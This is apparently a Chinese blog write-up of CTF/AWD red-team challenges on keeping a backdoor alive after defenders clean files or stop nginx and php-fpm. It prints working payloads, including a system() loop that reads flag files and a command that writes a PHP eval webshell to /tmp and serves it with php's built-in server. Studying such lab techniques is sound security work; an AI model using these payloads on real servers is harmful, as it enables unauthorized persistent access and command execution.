后渗透维权提权基础——CTF模拟红队进行权限维持(二)

提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档

文章目录


靶场介绍

这里我们自然不可能去用真实的生产环境进行尝试,所以这里用一些CTF 靶场以考代练 来熟悉我们担任红队后应该做的哪些维权操作以及原理讲解;

这类题目是安全领域 AWD(Attack With Defense,攻防对抗)模式下的经典场景,核心考点在于权限维持。在常规的渗透测试中,拿到 WebShell 通常意味着拿下了目标;但在模拟真实红蓝对抗的 AWD 场景中,拿到初始权限仅仅是开始。你需要考虑如何让你的后门在防守方的疯狂清理、修补和溯源下存活下来。这就像在真实的攻防演练中,蓝队成员在接到预警后会迅速排查可疑进程、清除恶意文件并封堵漏洞。这道题就是让你站在红队攻击者的视角,编写一个让蓝队应急响应极其头疼的"不死马"(Undead Webshell),实现后门的持续驻留。

话不多说,我们直接开始;

了解详情请看:CTF模拟红队进行权限维持(一)

场景二

打开网页,我们可以发现与场景一的代码并没有区别:

(但真的只是看起来没有区别,这里我们套用之前的payload,可以发现并没有成功)

这里查看了一下文件权限,发现并没有写入权限

bash 复制代码
total 12
drwxr-xr-x  1 root root 4096 Aug 18  2021 .
drwxr-xr-x  1 root root 4096 Oct 18  2019 ..
-rw-r--r--  1 root root  381 Aug 18  2021 index.php

没有写入权限,接下来我们还能用什么方式上传"不死马"呢?

绕过方法(参考文章)

我也是第一次遇到这种情况,所以参考了网上的WP:

bash 复制代码
system('while true;do cat /f*;done');

在一个窗口发送后进程会锁死,另一个窗口check;第一个窗口就会不断返回flag

while true;do cat /tmp/f*;done是shell脚本的语法,满足条件(true)时,执行cat /f*命令。

不用管,直接执行check(只会删除掉文件,而不是进程)

再执行一次命令即可:

bash 复制代码
GET:?action=cmd

POST:cmd=system('sleep 10;cat /f*');

场景三

题目描述:check后,会停止一切web服务,包括nginx php-fpm,天地同寿的打法,你能应付吗

相对于前两关,该场景应对的条件更加的苛刻:

绕过思路

这里参照网上大神们的方法:

(1) 首先是启动php内置服务器,类似于python 能开启http服务一样(因为Web服务器关闭并不会影响服务器本身运行的php,python服务的运行)

(2) 由于是www-data 权限,⽆法直接启动nginx和php-fpm,但是可以启动php内置服务器php -S 0.0.0.0:80,运行命令的根目录就被当成web服务根目录。

(3)在可写的/tmp目录下传木马并写系统命令,然后提交10秒内进⾏check,check会关闭nginxphp-fpm ,由于是www-data权限,⽆法启动nginx和php-fpm,直接启动php内置服务器即可;

php 复制代码
cmd=file_put_contents("/tmp/index.php","<?php eval(\$_POST['a']);?>");system("sleep 10 && php -S 0.0.0.0:80 -t /tmp/");

传入后可以在看看有没有成功写入php:

10s内 执行check 后:

十秒结束后php内置服务开启,我们就可以使用木马执行命令。

执行木马命令:

总结

至此,最简单的权限维持场景我们都有所了解,之后就可以接触更多相应的知识来巩固我们的技术能力;

相关推荐
狂炫冰美式11 分钟前
人均配了AI, 为什么公司还是没变快? 🤔 本质还是分布式系统问题
前端·后端·架构
乘风gg1 小时前
多 Agent 不是万能的!搞懂这 5 个原则,少走 1 年弯路!
前端·agent·ai编程
猩猩程序员2 小时前
Vercel 推出 Agent 框架 Eve:让 AI Agent 像写 Web 应用一样简单
前端
爱读源码的大都督2 小时前
Claude Code源码分析(三):为什么系统提示词中需要有tools呢?
前端·人工智能·后端
爱勇宝2 小时前
Claude Code 被曝暗藏“隐形检测”代码:封代理不是最可怕的,可怕的是你根本不知道它在干什么
前端·后端·程序员
小牛不牛的程序员3 小时前
我用 Claude Code 半天撸完了一个完整网站,AI 编程到底提升了多少效率?
前端
东风破_3 小时前
JavaScript 面试常考的字符串算法:从反转字符串到回文判断
前端·javascript
ITOM运维行者3 小时前
从零搭建企业级服务器监控体系:踩坑实录与架构设计
前端·后端
monologues3 小时前
深入 Vue 3 源码:响应式系统的精妙设计与编译优化
前端
hunterandroid3 小时前
Paging 3 分页:从手动分页到声明式加载
前端